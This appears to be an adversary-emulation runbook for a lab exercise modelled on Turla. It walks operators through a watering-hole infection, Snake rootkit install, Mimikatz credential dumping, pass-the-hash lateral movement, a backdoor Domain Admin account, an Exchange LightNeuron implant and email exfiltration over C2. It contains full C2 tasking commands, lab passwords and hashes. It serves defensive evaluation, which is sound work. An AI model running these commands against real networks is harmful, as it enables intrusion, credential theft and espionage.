# Scenario Overview

Legend of symbols:

  • 💡 - callout notes
  • - extremely important note
  • ➡️ - Switching to another session
  • - Sign out of something

# Setup

➡️ RDP, do not SSH, to the Kali attacker machine (176.59.15.33).

  • Open a new terminal window, cd to the cloned repo control server, and start the control server:
cd /opt/day2/turla/Resources/control_server
rm logs.txt
sudo ./controlServer -c ./config/turla_day2.yml
  • Ensure the EPIC, Snake, and LightNeuron handlers started up.

# Step 11 - Initial Compromise and Establish Foothold

🎤 Voice Track:

Step 11 emulates Turla gaining initial access via a watering hole attack targeting user Egle.

Egle visits a legitimate, but compromised website. This website redirects Egle to a duplicated, malicious version of the compromised website hosted on an adversary server containing javascript (JS) that fingerprints their machine in the background and installs an evercookie on their browser.

This malicious WordPress website prompts Egle with a notice to update their NotFlash. Egle clicks to download the update, NFVersion_5e.exe, containing EPIC (a.k.a. Tavdig/Wipbot).

The execution flow of EPIC follows the same execution flow of EPIC in the Carbon scenario. The only difference with this scenario's version of EPIC is it communicates over HTTPS instead.

Once C2 communications have been established between EPIC and the C2 via the proxy server, discovery is performed on the first host where information about the host device and domain computers is collected.

# ☣️ Procedures

➡️ RDP to Azuolas (10.100.40.103) as Egle:

Username Password
nk\Egle Producer1!

  • Open Microsoft Edge and browse to nato-int.com.

  • Wait for redirection to anto-int.com.

  • After redirection you will prompted to update NotFlash. Click to download the update (NFVersion_5e.exe) bundled with EPIC (a.k.a. Tavdig/Wipbot).

  • Once the download has been completed, click the downloaded binary to execute it.

  • Wait 1 minute for it to finish running.

  • Close out of all tabs and sign out of your RDP session.

  • Re-RDP to Azuolas (10.100.40.103) as Egle:

Username Password
nk\Egle Producer1!
  • Open Microsoft Edge and browse to https://drebule.nk.local/owa. Log in as Egle:
Username Password
nk\Egle Producer1!

➡️ Set a timer for 2 minutes then switch to your Kali control server terminal and confirm that a new implant has registered and the automated discovery output has been returned in the server log.

NOTE: The injector will wait 2 minutes, before injecting EPIC's Guard DLL into explorer.exe and, subsequently, EPIC's worker DLL into Microsoft Edge.

  • Within the terminal window, split your terminal horizontally via right-click -> split terminal. Be careful not to accidentally terminate the control server.

  • In your lower terminal tab, task the EPIC implant with the following set of discovery commands:

cd /opt/day2/turla/Resources/control_server
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | systeminfo && net group "Domain Computers" /domain'

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 12 - Rootkit Installation

🎤 Voice Track:

Step 12 emulates Turla exploiting a vulnerable driver to install the Snake rootkit on the Azuolas (10.100.40.103) system.

The existing EPIC implant, running under the context of Egle, will be used to download the Snake installer to the local machine and execute the installer as second stage malware. The Snake installer will escalate privileges to SYSTEM by exploiting a Windows 10 vulnerability. Once running as SYSTEM, the installer will disable DSE by loading and exploiting a vulnerable driver. Once DSE is disabled, the installer will load the Snake rootkit driver.

The rootkit driver will hook various functions and will inject a user-mode DLL into a SYSTEM process to execute received tasks from the C2 server. The driver will then wait for a browser process to make a network request to inject the user-mode DLL into the browser for C2 communications over HTTP. The injected DLLs will communicate between each other via named pipes.

At some point, Egle will browse to a website, triggering the rootkit driver to inject the user-mode DLL into the browser process - this DLL will begin communication with the C2 server over HTTP.

# ☣️ Procedures

  • In your Kali C2 server, ensure that you are in the lower split terminal window.

  • Task the EPIC implant to download the Snake rootkit installer.

./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'name | C:\\Users\\Egle\\Desktop\\gusbsys.exe | snake.exe'
  • Wait 1 minute after the payload is sucessfully downloaded before tasking the implant to execute the Snake rootkit installer with the privilege escalation option:
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | C:\\Users\\Egle\\Desktop\\gusbsys.exe -f'
  • ➡️ Switch to your RDP session in azuolas (10.100.40.103) and go to your Edge window. Perform a hard refresh on the current page by pressing Ctrl+Shift+R.

➡️ Return to your Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 13 - First Workstation Discovery

🎤 Voice Track:

Step 13 emulates Turla performing discovery on the first workstation to discover a file server and associated file server admin.

The Snake rootkit receives tasking from the C2 server to enumerate currently running processes on the local computer and finds that EgleAdmin also has processes running. Further enumeration of the EgleAdmin user shows that it is a member of the File Server Admins group. Snake then impersonates Egle to enumerate mapped drives on the local machine and discovers Egle's home drive is actively mapped to the file server.

# ☣️ Procedures

  • ➡️ Return to your RDP session to azuolas (10.100.40.103) as Egle.

  • Open up a powershell terminal and run the following command:

runas /user:nk\egleadmin powershell
  • When prompted, type in the password for EgleAdmin:
Username Password
nk\EgleAdmin Producer1!
  • A new powershell window should pop up. Run the following command to ensure that you are running as nk\EgleAdmin:
whoami

  • ➡️ Return to your Kali C2 server.

  • From your lower Kali C2 terminal window, task the Snake rootkit to run the following process discovery command:

# Discover running processes
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
  • Verify that the enumerated processes output contains a process running under EgleAdmin
grep 'NK\\EgleAdmin' logs.txt -i
  • This should return output similar to the following:
  • powershell.exe                2868 RDP-Tcp#6                  5     79,140 K Unknown         NK\egleadmin                                            0:00:00 N/A
conhost.exe                   7368 RDP-Tcp#6                  5     18,088 K Unknown         NK\egleadmin                                            0:00:00 N/A

  • Wait 1 minute then execute the next discovery command to enumerate EgleAdmin's groups:

# Enumerate details on EgleAdmin to find group membership
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "user /domain EgleAdmin"}'

Verify that File Server Admins is listed as one of the groups that EgleAdmin is a member of.

  • Wait 1 minute then execute the next discovery command to the drive mapped to the file server:
# Discover that the local machine has a drive mapped to the file server
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "use", "runas": "nk\\Egle"}'

Verify that the home drive is mapped to the file server host berzas (10.100.30.204).

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 14 - Lateral Movement to File Server

🎤 Voice Track:

Step 14 emulates Turla using the discovered admin account to laterally move to the file server and install the Snake rootkit on it.

Using the information discovered in the previous step, Snake impersonates the EgleAdmin account to run PsExec and execute another copy of the Snake rootkit installer on the file server. This new copy of the Snake installer will have the installed rootkit beacon back to the C2 server via a different redirector.

# ☣️ Procedures

  • Tasking the implant to download PsExec.
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "PsExec.exe", "dest":"C:\\Windows\\System32\\file_svc_mgr.exe"}'
  • Wait 1 minute and then run the following command to download the snake installer:
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "installer_v2.exe", "dest":"C:\\Windows\\System32\\cmu_svc_v2.exe"}'
  • Wait 1 minute before running the following command to execute PsExec as EgleAdmin, which will run the Snake installer on the file server berzas (10.100.30.204):
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "C:\\Windows\\System32\\file_svc_mgr.exe", "args":"\\\\berzas -accepteula -s -c C:\\Windows\\System32\\cmu_svc_v2.exe", "runas":"nk\\EgleAdmin"}'

➡️ Go back to your RDP session to Azuolas (10.100.40.103) as Egle.

  • Minimize the RDP window.

➡️ RDP into berzas (10.100.30.204) as EgleAdmin:

Username Password
nk\EgleAdmin Producer1!

  • Close any spurious windows

  • Open Edge and navigate to https://www.google.com. Perform a search on File server configuration best practices, but don't click on any results.

  • Minimize the RDP window, keeping processes running.

➡️ Check the Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.

  • Wait 1 minute before running the following command to remove files from Azuolas (10.100.40.103):
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\file_svc_mgr.exe C:\\Windows\\System32\\cmu_svc_v2.exe"}'

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 15 - Domain Discovery

🎤 Voice Track:

Step 15 emulates Turla using Powershell to perform Active Directory user, group, and computer discovery.

The Snake rootkit receives tasking from the C2 server to use Powershell's ActiveDirectory module to enumerate domain users, admin groups, and computers. Upon discovering Zilvinas's regular and domain admin accounts, Snake will enumerate further details on the accounts. Snake then discovers a workstation belonging to Zilvinas to use as a future lateral movement target.

# ☣️ Procedures

  • From your lower Kali C2 control server terminal window, task Snake to check if the ActiveDirectory PowerShell module is installed.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Get-Module -ListAvailable -Name ActiveDirectory"}'

Verify that you see output. If the implant returns empty output, please contact your lead.

  • Wait 1 minute before tasking Snake to collect a list of Active Directory groups containing the word "management", as members of these groups will likely have elevated permissions on the network.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroup -Filter * | Where-Object Name -Match \"management\" | Select Name"}'

Verify that Server Management is included in the results.

  • Wait 1 minute before tasking Snake to obtain the usernames of accounts within the Server Management domain group. This will instruct Turla on users to target next.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Server Management\" | Select Name,SamAccountName"}'

Verify that ZilvinasAdminshows up in the list of accounts.

  • Wait 1 minute before tasking Snake to obtain the usernames of accounts within the Domain Admins domain group.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Domain Admins\" | Select Name,SamAccountName"}'

Verify that ZilvinasAdminshows up in the list of accounts.

  • Wait 1 minute before tasking Snake to discover domain users. Ensure Zilvinas and ZilvinasAdmin appear in the output.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADUser -Filter {LastLogonDate -ne 0} -Properties * | Select Name,SamAccountName"}'
  • Finally, wait 1 minute before tasking Snake to obtain a list of domain computers and some of their information (IP addresses, DNS names, and description).
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Select Name,DnsName,IPv4Address,Description"}'

Ensure that Zilvinas' Workstation appears in the Description field for uosis

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 16 - Preparation for Lateral Movement to Admin Workstation

🎤 Voice Track:

Step 16 emulates Turla performing credential dumping on the file server with the goal of moving laterally to a workstation owned by a Domain Admin.

Snake downloads Mimikatz to the file server and extracts all NTLM hashes on the target. The command output is sent directly to the C2 server.

# ☣️ Procedures

  • From the Kali C2 server lower terminal window, task Snake to download Mimikatz to the file server:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "mimikatz.exe", "dest": "C:\\Windows\\System32\\loadperf.exe"}'
  • Wait 1 minute and then instruct Snake to download PsExec to the file server:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "PsExec.exe", "dest": "C:\\Windows\\System32\\fs_mgr.exe"}'
  • Wait 1 minute and then run the following command to download the snake installer:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "installer_v3.exe", "dest":"C:\\Windows\\System32\\cmu_svc.exe"}'
  • Wait 1 minute and then instruct Snake to run Mimikatz to dump all NTLM hashes from LSASS.exe:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::lop\" \"quit\""}'
  • Verify that the password Producer2! and NTLM hash f3fcd61f987a97da49ce5f650b4e6539 for ZilvinasAdmin appears at least once in the output.
grep '* Username : ZilvinasAdmin' logs.txt -C 5 -i
  • This should return:
  •     * Username : ZilvinasAdmin
    * Domain   : NK
    * NTLM     : f3fcd61f987a97da49ce5f650b4e6539
    * SHA1     : fc8c801521140666c793108b67716caf4c4189f4
    * DPAPI    : b06d7bea8849897b811e1d73ab22726c
    tsPkG : 
--
    * Username : ZilvinasAdmin
    * Domain   : NK
    * Password : Producer2!
    kErberoS : 
    * Username : ZilvinasAdmin
    * Domain   : NK.LOCAL
    * Password : (null)
    sSp : 
    crEdMan :

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 17 - Lateral Movement to Admin Workstation and Persistence

🎤 Voice Track:

Step 17 emulates Turla performing lateral movement to the domain admin's workstation and performing additional persistence by creating a new domain admin account.

The retrieved NTLM hash discovered in the previous step is used in a pass-the-hash attack to move laterally to Zilvinas's workstation. PsExec is used via pass-the-hash to execute and install the Snake rootkit on the target workstation.

Once the admin workstation has been compromised, Snake is used to enumerate processes running on Zilvinas's workstation uosis, where it is discovered that ZilvinasAdmin has processes running which can be used for token impersonation. By impersonating ZilvinasAdmin, a new domain user Leshy is created and added to the Domain Admins domain group for persistence.

# ☣️ Procedures

  • Instruct Snake to pass-the-hash using ZilvinasAdmin's NTLM hash to run PsExec and install Snake on the target workstation.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"privilege::debug\" \"sekurlsa::pth /user:ZilvinasAdmin /ntlm:f3fcd61f987a97da49ce5f650b4e6539 /domain:nk.local /remotepc:uosis /pexe:C:\\Windows\\System32\\fs_mgr.exe /sys:1 /prun:C:\\Windows\\System32\\cmu_svc.exe\" \"quit\""}'

➡️ Wait 2 minutes. Start a new RDP session to uosis (10.100.40.102) as Zilvinas:

Username Password
nk\Zilvinas Producer2!
  • Open Edge and navigate to https://drebule.nk.local/owa. Log in as Zilvinas:
Username Password
nk\Zilvinas Producer2!
  • Spend a couple minutes reading through any unread emails to wait for the implant to start beaconing back to the C2 server.

➡️ Return to the Kali C2 terminal window and verify that a new implant session is beaconing back to the C2 server.

  • Wait 1 minute and then task the implant to delete artifacts from the file server.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 1, "command": "del /Q C:\\Windows\\System32\\fs_mgr.exe C:\\Windows\\System32\\loadperf.exe C:\\Windows\\System32\\cmu_svc.exe"}'

  • ➡️ Return to your RDP session to uosis (10.100.40.102) as Zilvinas.

  • Click on the search bar and search for powershell. Right click powershell and then click "Run as Administrator".

  • When prompted, type in the username and password for ZilvinasAdmin:

Username Password
nk\ZilvinasAdmin Producer2!
  • A new powershell window should pop up. Run the following command to ensure that you are running as nk\ZilvinasAdmin:
whoami

➡️ Return to the Kali C2 server

  • From the lower terminal window, task Snake to enumerate running processes on the machine to discover processes under ZilvinasAdmin.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
  • Verify that we find processes running under ZilvinasAdmin
grep 'NK\\ZilvinasAdmin' logs.txt -i
  • This should return output similar to the following:
  • powershell.exe                8152 RDP-Tcp#2                  3     83,280 K Unknown         NK\ZilvinasAdmin                                        0:00:00 N/A
conhost.exe                    312 RDP-Tcp#2                  3     17,356 K Unknown         NK\ZilvinasAdmin                                        0:00:00 N/A

  • Wait 1 minute, then instruct Snake to create a new domain user Leshy using an access token from one of the ZilvinasAdmin processes. Leshy will be used as a backdoor domain admin account for persistence on the domain.

./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net user leshy Password12345 /add /domain", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute, then instruct Snake to add Leshy to the Domain Admins group.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net group \"Domain Admins\" leshy /add /domain", "runas": "nk\\zilvinasadmin"}'

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 18 - Lateral Movement to Exchange Server

🎤 Voice Track:

Step 18 emulates Turla laterally moving to the Exchange server and installing the LightNeuron implant there.

Snake downloads LightNeuron and associated Powershell installation script and config files, transfers them to the Exchange server, and remotely executes the installation script using WMI to install LightNeuron on the Exchange server.

# ☣️ Procedures

  • From the Kali C2 lower terminal window, task Snake to download LightNeuron:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "ln_transport_agent.dll", "dest":"C:\\Windows\\System32\\mtxconf.dll"}'
  • Wait 1 minute and then task Snake to download the companion DLL for LightNeuron:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "n_installer_aux.dll", "dest":"C:\\Windows\\System32\\mtxcli.dll"}'
  • Wait 1 minute and then task Snake to download the Powershell installation script for LightNeuron.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "msiex.ps1", "dest":"C:\\Windows\\System32\\msiex.ps1"}'
  • Wait 1 minute and then task Snake to download the LightNeuron email rules file.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "rules.xml", "dest":"C:\\Windows\\System32\\wdr.rules.xml"}'
  • Wait 1 minute and then task Snake to download the LightNeuron config file.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "winmail.dat", "dest":"C:\\Windows\\System32\\perfe009.dat"}'
  • Wait 1 minute and then task Snake to copy LightNeuron, the rules config file, and the Powershell installation script to the remote target drebule, using token impersonation to perform the copy as ZilvinasAdmin.
# Copy LightNeuron
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxconf.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\agents\\Hygiene\\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll\"", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the next file:
# Copy LightNeuron companion DLL
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxcli.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\exdbdata.dll\"", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the next file:
# Copy installation script
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\msiex.ps1 \\\\drebule\\C$\\Windows\\System32\\msiex.ps1", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the rules file:
# Copy email rules file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\wdr.rules.xml \\\\drebule\\C$\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\msmdat.xml", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the last config file:
# Copy config file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\perfe009.dat \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\winmail.dat\"", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute and then task Snake to install LightNeuron remotely using WMI and Powershell, using ZilvinasAdmin's token
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "wmic.exe", "args": "/node:drebule /privileges:enable /output:STDOUT process call create \"cmd.exe /c powershell.exe -File C:\\Windows\\System32\\msiex.ps1 > C:\\Windows\\Temp\\msiexinstallation.log 2>&1\"", "runas": "nk\\ZilvinasAdmin"}'

Verify that the WMIC output shows a ReturnValue of 0.

  • Wait 1 minute and then task Snake to check the installation log for any errors:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "type \\\\drebule\\C$\\Windows\\Temp\\msiexinstallation.log", "runas": "nk\\ZilvinasAdmin"}'

Expected output will start with messages regarding PS-Session, the bottom of the file should look like:

PSComputerName        : localhost
RunspaceId            : 1e56a6dd-5fd2-4545-9db8-2a4ca6a77212
Enabled               : False
Priority              : 10
TransportAgentFactory : Microsoft.Exchange.Transport.Agent.ConnectionFiltering.ConnectionFilteringAgentFactory
AssemblyPath          : C:\Program Files\Microsoft\Exchange Server\V15\TransportRoles\agents\Hygiene\Microsoft.Exchange
                        .Transport.Agent.ConnectionFiltering.dll
IsCritical            : True
EscalationTeam        : 
Identity              : Connection Filtering Agent
IsValid               : True
ObjectState           : New

WARNING: Please exit Windows PowerShell to complete the installation.
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to stop...
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...

If the output contains any errors, notify your lead.

  • Wait 1 minute and then task Snake to remove artifacts from uosis (10.100.40.102):
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\msiex.ps1 C:\\Windows\\System32\\wdr.rules.xml C:\\Windows\\System32\\mtxconf.dll C:\\Windows\\System32\\mtxcli.dll C:\\Windows\\System32\\perfe009.dat"}'

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 19 - Discovery and Email Collection

🎤 Voice Track:

Step 19 emulates Turla sending several discovery commands to the LightNeuron implant and collecting and exfiltrating email traffic.

Emails with JPG attachments containing AES encrypted commands embedded using stegonagraphy are sent from the C2 server to the domain. LightNeuron's transport agent processes all emails via LightNeuron's companion DLL, which executes the embedded command and blocks delivery of the email from the C2 server.

LightNeuron automatically collects all emails with recipients matching nk.local in a log file (C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\msmdat.xml).

Eventually, LightNeuron is tasked to exfiltrate the email log, which is exfiltrated over the existing C2 channel.

# ☣️ Procedures

  • From the Kali C2 lower terminal window, task LightNeuron to perform system network configuration discovery:
./evalsC2client.py --set-task info@nk.local '5 | ipconfig /all'

  • If no response is received after 5 minutes, check the postfix logs on the Kali server to make sure the email was intercepted and processed correctly by LightNeuron.

    grep postfix /var/log/syslog
    • If there is a reject entry, that means the email, destined for a nonexistent user, was processed by the Exchange server, meaning that LightNeuron was either not successfully installed or is not working properly.

  • ➡️ Return to your RDP session to uosis (10.100.40.102) as Zilvinas.

  • Go to your Edge browser window with the OWA page. Your windows should still be up from Step 6.

  • Create a new email:

  • The email recipient should be the user egle@nk.local

  • The email subject should be SAP Integration Issue

  • The following text should be pasted in as the email body:

    Hi Egle,
After our meeting earlier I spoke with Tenko about the SAP integration issue that was preventing the users from logging in. I did a little digging and noticed there is an authentication error on the SAP server.

When you get a few minutes could you check to make sure the service account is still active and the credentials have not expired? The account name is SVC_SAP2.

  • Send the email

➡️ Switch to your RDP window to Azuolas (10.100.40.103) as Egle.

  • Go to your Edge browser window. You should still be logged into OWA from Step 2.

  • You should see the email from Zilvinas@nk.local. Try reloading the page if needed.

  • Reply to the email from Zilvinas.

  • The following text should be pasted in as the email reply body:

    Zilvinas,

I just checked on the service account. It appears that the account was still active, but the password had expired. I've adjusted the settings for the account, so the password should not expire again.

The new password is: dfsbH%T5RWf3bwq3aeGR$3%

Let me know if this fixes the authentication issue.

  • Send the email

➡️ Return to the Kali C2 server lower terminal window. Task the LightNeuron implant to exfiltrate the email log file:

./evalsC2client.py --set-task info@nk.local '3 | 0'
  • The file contents will be logged by the control server. Verify that exfil was logged by the control server by checking the terminal window with the server output or by checking the server log file. The logs should contain the password Egle sent to Zilvinas:
grep 'dfsbH%T5RWf3bwq3aeGR$3%' /opt/day2/turla/Resources/control_server/logs.txt

# 🗿 Source Code

# 🔬 Cited Intelligence